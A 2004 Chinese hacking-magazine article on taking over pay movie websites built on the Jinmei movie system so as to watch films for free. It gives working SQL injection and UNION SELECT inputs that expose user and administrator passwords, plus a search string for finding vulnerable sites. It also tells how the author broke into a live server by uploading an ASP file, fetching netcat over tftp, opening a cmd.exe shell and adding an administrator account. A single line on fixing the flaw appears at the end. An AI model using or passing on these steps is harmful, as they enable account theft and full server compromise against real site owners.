SQL注入奇招致勝 UNION查詢輕松免費看電影

此文發表在2004年黑客X檔案第4期 

周末無聊，同學想讓我幫他下載一些電影看，我爽快的答應了。看了這麼多期X檔案，水平自然長進不少，也沒事玩玩"雞"。這次想免費下載些電影，沒問題（我知道N多電影程序有漏洞）。閒話少說，切入正題。

我打開Google，隨便搜索了一下電影網站，點開了一個。看了一下界面，知道和金梅電影系統關聯很大。金梅系統和"洞"網（7.0安全多啦，自己想的）差不多，也是有N多漏洞，比如注入啊，COOKIE欺騙什麼的。我就在X檔案03年11期看過一篇文章，寫的是用ASC和MID函數對系統管理員帳戶進行猜測。我也想用這種方法猜測，猜了半天都沒猜對，真煩人，同學還在那邊等我哪，這不是很丟人。我決定找個簡單的辦法，還是讀讀源碼吧！

下載了一個金梅三電影系統，看了一下，這麼多個文件，頭馬上大了。還是在自己電腦上運行一下吧。注冊了一個用戶，點了一下找回密碼，別人說這裡有漏洞。看了一下，象是有漏洞的界面，有三個參數，還直接把密碼顯示出來。好，看一下源碼。

39        <% if request("myuserid")="" then %>

...
 

  58   <%else

            set rs=server.createobject("adodb.recordset")

            sql="select password from users where userid='"&request("myuserid")&"'and city='"&request("ask")&"'and adress='"&request("answer")&"'"

            rs.open sql,conn,1,1

            if rs.eof and rs.bof then%>

這裡果然沒過濾。好多人都想到了可以用上面的方法注入了。能不能有更簡單的方法呢？

我仔細考慮語句的形式如下：

select password from users where userid=‘‘ and city=‘‘ and adress='‘

如果用戶名，密碼提示問題(city)，密碼提示答案(adress)和表users一行匹配，便打印這行的password,而且是明文的。我想的過程就不寫了，後來我想到了一種方法，就是利用union查詢。Access功能是很弱的，不能執行命令，不能導出文本，還不能注釋。有個子查詢可以利用之外，也就剩下這個 union了。

[1] [2] 下一頁  

怎麼利用呢？先在本機做實驗。測試過程簡略，直接寫有所收獲的結果。

要是知道了一個該網站的一個用戶名（比如abc），可以這樣利用。

在"你注冊問題"處填: abc' or  ‘1=1(如果用戶名是bcd,就變為bcd' or ‘1=1)

密碼提示問題處隨便填幾個字母或數字，最好別有符號，容易影響結果: 比如字母a

密碼提示答案處隨便填幾個字母或數字，填個a

回車後就看到該用戶的密碼了，簡單吧（如圖一）。

其實這樣一來，上面的語句就變為:
 

select password from users where userid=‘abc'  or  ‘1=1‘ and city=‘a‘ and adress='a‘

呵呵，程序無條件的執行了，因為被 or ‘1=1'跳過後面的驗證了。

可是網站用戶名也不是輕易得到的啊。別急，得到用戶名一樣簡單。如下：

在"你注冊問題"處隨便處填幾個字母或數字，最好別有符號，容易影響結果: 比如字母a

密碼提示問題處和上面一樣，隨便填：我也填個a

關鍵是在密碼提示答案：我填的是a' union select  userid  from users where oklook>=3 or '0

上面就是要找黃金用戶的帳戶名（如圖二），看到用戶名後再用前面的方法找到密碼。

可以在where後面加很多參數並賦不同的值可以得到很多帳戶。

按上面的填入後輸入語句就變成了：

select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  userid  from users  where oklook>=3 or '0 ‘
 

細心的讀者看到這可能已經想到怎樣得到管理員的帳號和密碼，不錯，也很簡單。我也不寫過程了，直接寫出語句如下：

得到帳號：
 
select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  name  from okwiantgo  where  id>=1 or '0 ‘

得到密碼：

select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  pwd  from okwiantgo  where  id>=1 or '0 ‘

然後登陸就行了，路徑格式為：

http://網站電影路徑/findaccout.ASP?name=管理員帳號&pwd=管理員密碼

回車，很輕松就進管理界面了。（如圖三）

有時findaccount.asp可能被改名了，這時只能拿個黃金帳戶了。

這個漏洞有很多電影程序有，有的程序表名不是okwiantgo（程序會報告64行屬性不對），改成admin或password.,把上面的輸入稍微修改一下行了。這樣一來不管是多復雜的密碼,或者是中文密碼都沒問題。再猜管理員帳戶的時候也要多，where後面的條件多變化才行，否則可能得不到超級管理員。
 

這個漏洞使用很簡單，危害極大，輕易可以得到管理員帳戶。如果系統配置不當，在upload/uploadmovie.asp允許上傳ASP文件，系統就很容易換主人了。我曾經成功滲透過這樣一個網站，簡單過程敘述如下。

上傳一個ASP程序，發現該系統運行SQLSERVER，通過讀源文件看到了sa的密碼，用sqlexec連接，tftp上傳nc.exe。再次dir發現nc被刪了，有防火強。用tftp上傳nc.jpg肯定萬無一失， tftp  -i 我的IP get nc.exe nc.jpg,上傳成功。在sqlexec運行

nc.jpg -l -p 99 -e  c\winnt\system32\cmd.exe

nc想必都很熟悉了吧，上面就是再目標機器上開一個99端口監聽，同時把cmd.exe重定向到這裡，本地連接nc.exe  -vv 目標IP   99,得到shell,而且是管理員權限。

輸入 net user abc 123456 /add  &&  net  localgroup administrators abc /add

添加用戶成功順便加入管理員，&&意思是前面成功後面執行。該系統開著3389，省了我好多事情。

好了回到正題，這個漏洞存在80%以上電影程序中，在google裡搜索user/wantpws.asp，打開後發現可以輸入三個參數，且把密碼直接顯示的都有此漏洞。

修補方法，應該對三個參數進行嚴格驗證，而且把結果發送的到郵箱裡更穩妥，有的網站是這樣做的。

總結：我寫此問的目的是想說好多問題要多想多試，一個漏洞利用方法不只一種，我們要自己學會發現。入侵過程靈活多樣，我們應動腦筋。大家免費看電影的同時可別搞破壞啊，任何後果與我無關。同時我也希望看到這篇文章後，網站盡快更改。

上一頁  [1] [2] 

關鍵詞：電影